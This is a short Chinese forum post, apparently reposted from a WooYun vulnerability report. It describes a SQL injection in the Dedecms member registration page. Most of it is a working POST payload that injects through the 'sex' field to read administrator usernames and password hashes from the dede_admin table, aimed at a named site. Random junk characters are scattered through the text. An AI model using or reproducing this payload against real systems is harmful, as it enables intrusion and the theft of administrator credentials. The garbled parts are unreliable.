漏洞类型: SQL注射漏洞
, P6 Y+ T) V2 r' K$ X8 E简要描述:
$ S- g7 z# Z$ Y3 O - J# m9 |# {) ]! e! F
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.8 V; m8 e. r7 r- P: P" a& Q
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.3 w( F% [0 x; d" n, h P
详细说明:跟这个漏洞$ A% q2 J2 H9 B0 h( _! ^9 a
5 j( r& A- v6 c! b" N0 f4 L( jWooYun: Dedecms SQL注射导致审核机制绕过漏洞
1 R X2 ` _3 O- q, K是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.! ~+ |) j/ O* B; [+ w- j* z
POST提交以下数据,其实不用POST提交的,这样隐蔽点.* N' | n7 m( c1 t m5 ?
& ~ z0 b+ u" X j7 Mwww.political-security.com/member/reg_new.php; B. M7 [* r1 m( @: E
3 X& Z+ s( i8 k- iPOST
+ i2 h e$ t6 e- t8 z1 c
) T' C# a9 R" L( ?2 a' y. j" Kdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&! g$ @" l" Q" X% e: {1 q
userid=c4rp3nt3r&uname=c4rp3nt3r) e8 r2 g4 X1 D5 \8 s
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss: k# R1 C V% p! s6 R$ {
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
# n e4 E! M6 D5 ^(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');* T) R7 I* Z9 I! W# \# F4 o8 B5 }5 C
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对